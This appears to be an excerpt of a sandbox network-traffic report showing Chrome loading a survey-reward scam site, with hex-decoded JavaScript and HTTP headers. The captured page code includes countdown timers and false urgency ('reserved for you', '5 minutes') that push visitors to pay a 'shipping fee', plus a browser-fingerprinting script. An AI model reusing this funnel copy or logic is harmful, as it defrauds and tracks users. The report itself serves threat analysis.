                                                          2023-11-27 03:23:50 UTC1369INData Raw: 3d 20 6e 65 77 20 44 61 74 65 28 6e 6f 77 54 69 6d 65 20 2b 20 31 30 30 30 20 2a 20 36 30 20 2a 20 32 29 3b 20 2f 2f 72 65 73 65 74 20 74 6f 20 32 20 6d 69 6e 73 2e 0d 0a 09 09 09 09 24 28 27 23 63 6f 75 6e 74 64 6f 77 6e 2d 27 20 2b 20 6b 29 2e 68 74 6d 6c 28 27 32 3a 30 30 27 29 3b 0d 0a 09 09 09 09 76 61 6c 69 64 2b 2b 3b 0d 0a 09 09 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 09 09 24 28 27 23 63 6f 75 6e 74 64 6f 77 6e 2d 27 20 2b 20 6b 29 2e 68 74 6d 6c 28 6d 69 6e 75 74 65 73 20 2b 20 27 3a 27 20 2b 20 73 65 63 6f 6e 64 73 29 3b 0d 0a 09 09 09 09 76 61 6c 69 64 2b 2b 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 0d 0a 09 09 69 66 20 28 76 61 6c 69 64 20 3d 3d 20 30 29 20 7b 0d 0a 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 7a 29 3b 0d 0a 09 09 09 63 6f 6e
                                                          Data Ascii: = new Date(nowTime + 1000 * 60 * 2); //reset to 2 mins.$('#countdown-' + k).html('2:00');valid++;} else {$('#countdown-' + k).html(minutes + ':' + seconds);valid++;}}if (valid == 0) {clearInterval(z);con
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2d 74 65 78 74 22 20 3e 3c 21 2d 2d 3c 69 20 63 6c 61 73 73 3d 22 61 2d 69 63 6f 6e 20 61 2d 69 63 6f 6e 2d 63 61 72 74 22 3e 3c 2f 69 3e 2d 2d 3e 3c 62 3e 45 78 70 69 72 65 64 3c 2f 62 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 27 29 3b 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 09 09 09 24 28 27 23 63 6f 75 6e 74 64 6f 77 6e 2d 66 69 6e 61 6c 27 29 2e 68 74 6d 6c 28 6d 69 6e 75 74 65 73 20 2b 20 27 3a 27 20 2b 20 73 65 63 6f 6e 64 73 29 3b 0d 0a 09 09 09 09 7d 0d 0a 0d 0a 09 09 09 7d 2c 20 35 30 30 29 3b 0d 0a 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 7a 7a 29 3b 0d 0a 09 09 09 0d 0a 09 09 7d 0d 0a 09 0d 0a 09 7d 2c 20 32 30 30 29 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 6f 66
                                                          Data Ascii: -text" >...<i class="a-icon a-icon-cart"></i>--><b>Expired</b></span></span></span></div>');} else {$('#countdown-final').html(minutes + ':' + seconds);}}, 500);clearInterval(zz);}}, 200);}var of
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 27 29 3b 0d 0a 0d 0a 09 09 69 66 20 28 24 6e 65 78 74 51 75 65 73 74 69 6f 6e 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0d 0a 09 09 09 24 61 63 74 69 76 65 51 75 65 73 74 69 6f 6e 2e 66 61 64 65 4f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 09 09 09 24 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 61 63 74 69 76 65 27 29 3b 0d 0a 09 09 09 09 24 61 63 74 69 76 65 51 75 65 73 74 69 6f 6e 20 3d 20 24 6e 65 78 74 51 75 65 73 74 69 6f 6e 3b 0d 0a 09 09 09 09 24 61 63 74 69 76 65 51 75 65 73 74 69 6f 6e 2e 61 64 64 43 6c 61 73 73 28 27 61 63 74 69 76 65 27 29 3b 0d 0a 09 09 09 7d 29 3b 0d 0a 09 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 09 69 66 20 28 77 61 6c 6c 5f 6c 6f 61 64 65 64 29 0d 0a 09 09 09 09 72 65 74 75 72 6e 3b 0d 0a 09 09 09 0d
                                                          Data Ascii: ');if ($nextQuestion.length > 0) {$activeQuestion.fadeOut(function(){$(this).removeClass('active');$activeQuestion = $nextQuestion;$activeQuestion.addClass('active');});} else {if (wall_loaded)return;
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 6c 79 20 72 65 73 65 72 76 65 64 20 66 6f 72 20 79 6f 75 21 20 5c 5c 6e 5c 5c 6e 59 6f 75 20 68 61 76 65 20 35 20 6d 69 6e 75 74 65 73 20 62 65 66 6f 72 65 20 77 65 20 6f 66 66 65 72 20 69 74 20 74 6f 20 74 68 65 20 6e 65 78 74 20 71 75 61 6c 69 66 69 65 64 20 76 69 73 69 74 6f 72 21 5c 5c 6e 5c 5c 6e 4f 6e 20 74 68 65 20 6e 65 78 74 20 70 61 67 65 2c 20 72 65 61 64 20 74 68 65 20 72 65 77 61 72 64 20 6f 66 66 65 72 20 64 65 74 61 69 6c 73 20 61 6e 64 20 65 6e 74 65 72 20 79 6f 75 72 20 73 68 69 70 70 69 6e 67 20 61 64 64 72 65 73 73 20 61 6e 64 20 70 61 79 20 66 6f 72 20 61 20 73 6d 61 6c 6c 20 73 68 69 70 70 69 6e 67 20 66 65 65 20 28 22 20 2b 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 68 69 70 70 69 6e 67 22 29 20 2b 20 22 29 22 20
                                                          Data Ascii: ly reserved for you! \\n\\nYou have 5 minutes before we offer it to the next qualified visitor!\\n\\nOn the next page, read the reward offer details and enter your shipping address and pay for a small shipping fee (" + $(this).attr("data-shipping") + ")"
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 7b 0d 0a 09 09 09 09 6f 66 66 65 72 5b 37 5d 20 3d 20 6f 66 66 65 72 5b 37 5d 20 2b 20 22 2d 22 20 2b 20 6a 74 73 3b 0d 0a 09 09 09 09 0d 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 63 69 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0d 0a 09 09 09 09 09 6f 66 66 65 72 5b 37 5d 20 3d 20 6f 66 66 65 72 5b 37 5d 20 2b 20 22 2d 22 20 2b 20 63 69 3b 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 70 74 66 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0d 0a 09 09 09 09 09 09 6f 66 66 65 72 5b 37 5d 20 3d 20 6f 66 66 65 72 5b 37 5d 20 2b 20 22 2d 22 20 2b 20 70 74 66 3b 0d 0a 09 09 09 09 09 7d 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 7d 0d 0a 09 09 7d 0d 0a 09 7d 0d 0a 09 69 66 20 28 74 79 70 65 6f 66 20 76 69 65 77 20
                                                          Data Ascii: {offer[7] = offer[7] + "-" + jts;if (typeof ci != "undefined") {offer[7] = offer[7] + "-" + ci;if (typeof ptf != "undefined") {offer[7] = offer[7] + "-" + ptf;}}}}}if (typeof view


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.549732104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3686OUTGET /js/fingerprintjs2/1.5.0/fingerprint2.min.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC725INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 31 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 38 37 30 64 2d 36 30 38 39 30 32 66 32 37 36 32 65 31 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:49 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:19 GMTETag: W/"870d-608902f2762e1-gzip"Vary: Accept-EncodingCache-Contro
                                                          2023-11-27 03:23:50 UTC644INData Raw: 37 63 64 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 69 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 69 28 29 3a 74 2e 65 78 70 6f 72 74 73 3f 74 2e 65 78 70 6f 72 74 73 3d 69 28 29 3a 74 5b 65 5d 3d 69 28 29 7d 28 22 46 69 6e 67 65 72 70 72 69 6e 74 32 22 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 7c 7c 28 41 72 72 61 79
                                                          Data Ascii: 7cda!function(e,t,i){"use strict";"function"==typeof define&&define.amd?define(i):"undefined"!=typeof module&&module.exports?module.exports=i():t.exports?t.exports=i():t[e]=i()}("Fingerprint2",this,function(){"use strict";Array.prototype.indexOf||(Array
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 6e 74 6a 73 32 22 2c 73 77 66 50 61 74 68 3a 22 66 6c 61 73 68 2f 63 6f 6d 70 69 6c 65 64 2f 46 6f 6e 74 4c 69 73 74 2e 73 77 66 22 2c 64 65 74 65 63 74 53 63 72 65 65 6e 4f 72 69 65 6e 74 61 74 69 6f 6e 3a 21 30 2c 73 6f 72 74 50 6c 75 67 69 6e 73 46 6f 72 3a 5b 2f 70 61 6c 65 6d 6f 6f 6e 2f 69 5d 2c 75 73 65 72 44 65 66 69 6e 65 64 46 6f 6e 74 73 3a 5b 5d 7d 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 74 68 69 73 2e 65 78 74 65 6e 64 28 74 2c 69 29 2c 74 68 69 73 2e 6e 61 74 69 76 65 46 6f 72 45 61 63 68 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2c 74 68 69 73 2e 6e 61 74 69 76 65 4d 61 70 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 70 7d 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 65 78 74 65
                                                          Data Ascii: ntjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]};this.options=this.extend(t,i),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={exte
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 67 65 74 55 73 65 72 41 67 65 6e 74 28 29 7d 29 2c 65 7d 2c 67 65 74 55 73 65 72 41 67 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 7d 2c 6c 61 6e 67 75 61 67 65 4b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 78 63 6c 75 64 65 4c 61 6e 67 75 61 67 65 7c 7c 65 2e 70 75 73 68 28 7b 6b 65 79 3a 22 6c 61 6e 67 75 61 67 65 22 2c 76 61 6c 75 65 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 62 72 6f 77 73 65 72 4c 61 6e 67 75 61 67 65 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 73 79 73 74 65 6d 4c 61 6e 67 75 61
                                                          Data Ascii: getUserAgent()}),e},getUserAgent:function(){return navigator.userAgent},languageKey:function(e){return this.options.excludeLanguage||e.push({key:"language",value:navigator.language||navigator.userLanguage||navigator.browserLanguage||navigator.systemLangua
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 3a 22 61 76 61 69 6c 61 62 6c 65 5f 72 65 73 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 74 7d 29 2c 65 7d 2c 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 4b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 78 63 6c 75 64 65 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 7c 7c 65 2e 70 75 73 68 28 7b 6b 65 79 3a 22 74 69 6d 65 7a 6f 6e 65 5f 6f 66 66 73 65 74 22 2c 76 61 6c 75 65 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 7d 29 2c 65 7d 2c 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 4b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 78 63 6c 75 64 65 53 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 26 26
                                                          Data Ascii: :"available_resolution",value:t}),e},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||e.push({key:"timezone_offset",value:(new Date).getTimezoneOffset()}),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 70 28 29 7d 29 2c 65 7d 2c 77 65 62 67 6c 4b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 78 63 6c 75 64 65 57 65 62 47 4c 3f 65 3a 74 68 69 73 2e 69 73 57 65 62 47 6c 53 75 70 70 6f 72 74 65 64 28 29 3f 28 65 2e 70 75 73 68 28 7b 6b 65 79 3a 22 77 65 62 67 6c 22 2c 76 61 6c 75 65 3a 74 68 69 73 2e 67 65 74 57 65 62 67 6c 46 70 28 29 7d 29 2c 65 29 3a 65 7d 2c 61 64 42 6c 6f 63 6b 4b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 78 63 6c 75 64 65 41 64 42 6c 6f 63 6b 7c 7c 65 2e 70 75 73 68 28 7b 6b 65 79 3a 22 61 64 62 6c 6f 63 6b 22 2c 76 61 6c 75 65 3a 74 68 69 73 2e 67 65 74 41 64 42 6c 6f 63 6b 28 29 7d 29 2c 65 7d 2c 68 61 73
                                                          Data Ascii: p()}),e},webglKey:function(e){return this.options.excludeWebGL?e:this.isWebGlSupported()?(e.push({key:"webgl",value:this.getWebglFp()}),e):e},adBlockKey:function(e){return this.options.excludeAdBlock||e.push({key:"adblock",value:this.getAdBlock()}),e},has
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 72 72 6f 77 22 2c 22 41 72 69 61 6c 20 52 6f 75 6e 64 65 64 20 4d 54 20 42 6f 6c 64 22 2c 22 41 72 69 61 6c 20 55 6e 69 63 6f 64 65 20 4d 53 22 2c 22 42 69 74 73 74 72 65 61 6d 20 56 65 72 61 20 53 61 6e 73 20 4d 6f 6e 6f 22 2c 22 42 6f 6f 6b 20 41 6e 74 69 71 75 61 22 2c 22 42 6f 6f 6b 6d 61 6e 20 4f 6c 64 20 53 74 79 6c 65 22 2c 22 43 61 6c 69 62 72 69 22 2c 22 43 61 6d 62 72 69 61 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 2c 22 43 65 6e 74 75 72 79 22 2c 22 43 65 6e 74 75 72 79 20 47 6f 74 68 69 63 22 2c 22 43 65 6e 74 75 72 79 20 53 63 68 6f 6f 6c 62 6f 6f 6b 22 2c 22 43 6f 6d 69 63 20 53 61 6e 73 22 2c 22 43 6f 6d 69 63 20 53 61 6e 73 20 4d 53 22 2c 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 43 6f 75 72 69 65 72 22 2c 22 43 6f 75 72 69 65 72 20 4e 65
                                                          Data Ascii: rrow","Arial Rounded MT Bold","Arial Unicode MS","Bitstream Vera Sans Mono","Book Antiqua","Bookman Old Style","Calibri","Cambria","Cambria Math","Century","Century Gothic","Century Schoolbook","Comic Sans","Comic Sans MS","Consolas","Courier","Courier Ne
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 72 64 65 20 42 6b 20 42 54 22 2c 22 41 76 61 6e 74 47 61 72 64 65 20 4d 64 20 42 54 22 2c 22 41 56 45 4e 49 52 22 2c 22 41 79 75 74 68 61 79 61 22 2c 22 42 61 6e 64 79 22 2c 22 42 61 6e 67 6c 61 20 53 61 6e 67 61 6d 20 4d 4e 22 2c 22 42 61 6e 6b 20 47 6f 74 68 69 63 22 2c 22 42 61 6e 6b 47 6f 74 68 69 63 20 4d 64 20 42 54 22 2c 22 42 61 73 6b 65 72 76 69 6c 6c 65 22 2c 22 42 61 73 6b 65 72 76 69 6c 6c 65 20 4f 6c 64 20 46 61 63 65 22 2c 22 42 61 74 61 6e 67 22 2c 22 42 61 74 61 6e 67 43 68 65 22 2c 22 42 61 75 65 72 20 42 6f 64 6f 6e 69 22 2c 22 42 61 75 68 61 75 73 20 39 33 22 2c 22 42 61 7a 6f 6f 6b 61 22 2c 22 42 65 6c 6c 20 4d 54 22 2c 22 42 65 6d 62 6f 22 2c 22 42 65 6e 67 75 69 61 74 20 42 6b 20 42 54 22 2c 22 42 65 72 6c 69 6e 20 53 61 6e 73 20 46
                                                          Data Ascii: rde Bk BT","AvantGarde Md BT","AVENIR","Ayuthaya","Bandy","Bangla Sangam MN","Bank Gothic","BankGothic Md BT","Baskerville","Baskerville Old Face","Batang","BatangChe","Bauer Bodoni","Bauhaus 93","Bazooka","Bell MT","Bembo","Benguiat Bk BT","Berlin Sans F
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2c 22 45 62 72 69 6d 61 22 2c 22 45 64 77 61 72 64 69 61 6e 20 53 63 72 69 70 74 20 49 54 43 22 2c 22 45 6c 65 70 68 61 6e 74 22 2c 22 45 6e 67 6c 69 73 68 20 31 31 31 20 56 69 76 61 63 65 20 42 54 22 2c 22 45 6e 67 72 61 76 65 72 73 20 4d 54 22 2c 22 45 6e 67 72 61 76 65 72 73 47 6f 74 68 69 63 20 42 54 22 2c 22 45 72 61 73 20 42 6f 6c 64 20 49 54 43 22 2c 22 45 72 61 73 20 44 65 6d 69 20 49 54 43 22 2c 22 45 72 61 73 20 4c 69 67 68 74 20 49 54 43 22 2c 22 45 72 61 73 20 4d 65 64 69 75 6d 20 49 54 43 22 2c 22 45 75 63 72 6f 73 69 61 55 50 43 22 2c 22 45 75 70 68 65 6d 69 61 22 2c 22 45 75 70 68 65 6d 69 61 20 55 43 41 53 22 2c 22 45 55 52 4f 53 54 49 4c 45 22 2c 22 45 78 6f 74 63 33 35 30 20 42 64 20 42 54 22 2c 22 46 61 6e 67 53 6f 6e 67 22 2c 22 46 65
                                                          Data Ascii: ,"Ebrima","Edwardian Script ITC","Elephant","English 111 Vivace BT","Engravers MT","EngraversGothic BT","Eras Bold ITC","Eras Demi ITC","Eras Light ITC","Eras Medium ITC","EucrosiaUPC","Euphemia","Euphemia UCAS","EUROSTILE","Exotc350 Bd BT","FangSong","Fe
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 41 22 2c 22 49 6e 66 6f 72 6d 61 6c 20 52 6f 6d 61 6e 22 2c 22 49 6e 66 6f 72 6d 61 6c 30 31 31 20 42 54 22 2c 22 49 4e 54 45 52 53 54 41 54 45 22 2c 22 49 72 69 73 55 50 43 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4a 61 73 6d 69 6e 65 55 50 43 22 2c 22 4a 61 7a 7a 20 4c 45 54 22 2c 22 4a 65 6e 73 6f 6e 22 2c 22 4a 65 73 74 65 72 22 2c 22 4a 6f 6b 65 72 6d 61 6e 22 2c 22 4a 75 69 63 65 20 49 54 43 22 2c 22 4b 61 62 65 6c 20 42 6b 20 42 54 22 2c 22 4b 61 62 65 6c 20 55 6c 74 20 42 54 22 2c 22 4b 61 69 6c 61 73 61 22 2c 22 4b 61 69 54 69 22 2c 22 4b 61 6c 69 6e 67 61 22 2c 22 4b 61 6e 6e 61 64 61 20 53 61 6e 67 61 6d 20 4d 4e 22 2c 22 4b 61 72 74 69 6b 61 22 2c 22 4b 61 75 66 6d 61 6e 6e 20 42 64 20 42 54 22 2c 22 4b 61 75 66 6d 61 6e 6e 20 42
                                                          Data Ascii: A","Informal Roman","Informal011 BT","INTERSTATE","IrisUPC","Iskoola Pota","JasmineUPC","Jazz LET","Jenson","Jester","Jokerman","Juice ITC","Kabel Bk BT","Kabel Ult BT","Kailasa","KaiTi","Kalinga","Kannada Sangam MN","Kartika","Kaufmann Bd BT","Kaufmann B


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.549736104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3697OUTGET /assets/js/mobile-detect.js-master/mobile-detect.min.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
